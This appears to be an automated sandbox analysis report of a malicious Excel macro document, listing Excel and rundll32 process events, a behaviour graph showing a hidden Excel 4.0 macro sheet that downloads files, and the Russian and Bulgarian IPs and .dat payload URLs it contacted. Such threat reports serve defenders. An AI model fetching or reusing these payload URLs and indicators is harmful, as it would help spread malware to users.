Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: rundll32.exe, 0000000D.00000002.296066188.00000000033F0000.00000002.00000001.sdmp, rundll32.exe, 0000000E.00000002.309545784.0000000003380000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: rundll32.exe, 0000000D.00000002.296066188.00000000033F0000.00000002.00000001.sdmp, rundll32.exe, 0000000E.00000002.309545784.0000000003380000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: rundll32.exe, 0000000D.00000002.296066188.00000000033F0000.00000002.00000001.sdmp, rundll32.exe, 0000000E.00000002.309545784.0000000003380000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: rundll32.exe, 0000000D.00000002.296066188.00000000033F0000.00000002.00000001.sdmp, rundll32.exe, 0000000E.00000002.309545784.0000000003380000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 383366 Sample: Comission_1980420924_031720... Startdate: 07/04/2021 Architecture: WINDOWS Score: 64 25 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->25 27 Found abnormal large hidden Excel 4.0 Macro sheet 2->27 29 Found Excel 4.0 Macro with suspicious formulas 2->29 31 Document exploit detected (process start blacklist hit) 2->31 6 EXCEL.EXE 37 46 2->6         started        process3 dnsIp4 19 188.119.112.114, 49718, 80 SERVERIUS-ASNL Russian Federation 6->19 21 185.82.219.75, 49719, 80 ITL-BG Bulgaria 6->21 23 188.127.230.104, 80 DHUBRU Russian Federation 6->23 17 C:\...\~$Comission_1980420924_03172021.xlsm, data 6->17 dropped 33 Document exploit detected (UrlDownloadToFile) 6->33 11 rundll32.exe 6->11         started        13 rundll32.exe 6->13         started        15 rundll32.exe 6->15         started        file5 signatures6 process7
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
188.119.112.114
unknown Russian Federation
50673 SERVERIUS-ASNL false
188.127.230.104
unknown Russian Federation
56694 DHUBRU false
185.82.219.75
unknown Bulgaria
59729 ITL-BG false

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.82.219.75/44293.7328152778.dat false
  • Avira URL Cloud: safe
unknown
http://188.119.112.114/44293.7328152778.dat false
  • Avira URL Cloud: safe
unknown